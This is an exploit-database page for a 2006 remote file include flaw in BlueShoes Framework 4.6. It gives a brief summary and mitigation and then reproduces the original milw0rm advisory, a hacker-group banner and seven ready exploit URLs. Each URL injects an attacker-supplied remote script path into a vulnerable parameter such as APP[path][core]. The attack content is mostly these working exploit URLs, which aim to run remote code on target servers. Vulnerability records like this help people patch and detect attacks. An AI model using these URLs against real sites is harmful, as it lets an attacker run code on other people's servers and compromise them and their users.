header-logo
Suggest Exploit
vendor:
BlueShoes Framework
by:
Kacper (a.k.a Rahim)
7.5
CVSS
HIGH
Remote File Include
98
CWE
Product Name: BlueShoes Framework
Affected Version From: 4.6
Affected Version To: 4.6
Patch Exists: NO
Related CWE: N/A
CPE: a:blueshoes:blueshoes_framework
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

BlueShoes Framework 4.6 <= Remote File Include Vulnerability

BlueShoes Framework 4.6 is vulnerable to a remote file include vulnerability. This vulnerability allows an attacker to include a remote file, usually through a malicious URL, containing arbitrary code which is then executed on the vulnerable server. The vulnerable parameters are APP[path][applications], APP[path][core], GLOBALS[APP][path][core], and APP[path][plugins].

Mitigation:

The best way to mitigate this vulnerability is to ensure that user input is properly sanitized and validated before being used in any file include operations.
Source

Exploit-DB raw data:

$$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$
$$
$$  BlueShoes Framework 4.6 <= Remote File Include Vulnerability
$$  Script site: http://www.blueshoes.org/
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$              Find by: Kacper (a.k.a Rahim)
$$
$$ Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$  Greetz: DragonHeart, Satan, Leito, Leon, Luzak,
$$           Adam, DeathSpeed, Drzewko, pepi
$$
$$  Specjal greetz: DragonHeart ;-)
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

Expl:

http://www.site.com/[BlueShoes_path]/applications/faq/Bs_Faq.class.php?APP[path][applications]=[evil_scripts]

http://www.site.com/[BlueShoes_path]/applications/filebrowser/fileBrowserInner.php?APP[path][core]=[evil_scripts]

http://www.site.com/[BlueShoes_path]/applications/filemanager/file.php?APP[path][core]=[evil_scripts]

http://www.site.com/[BlueShoes_path]/applications/filemanager/viewer.php?APP[path][core]=[evil_scripts]

http://www.site.com/[BlueShoes_path]/applications/imagearchive/Bs_ImageArchive.class.php?APP[path][core]=[evil_scripts]

http://www.site.com/[BlueShoes_path]/applications/mailinglist/Bs_Ml_User.class.php?GLOBALS[APP][path][core]=[evil_scripts]

http://www.site.com/[BlueShoes_path]/applications/websearchengine/Bs_Wse_Profile.class.php?APP[path][plugins]=[evil_scripts]

#Pozdro dla wszystkich ;-)

# milw0rm.com [2006-06-03]

Navigation

Suggest Exploit

Services By CQR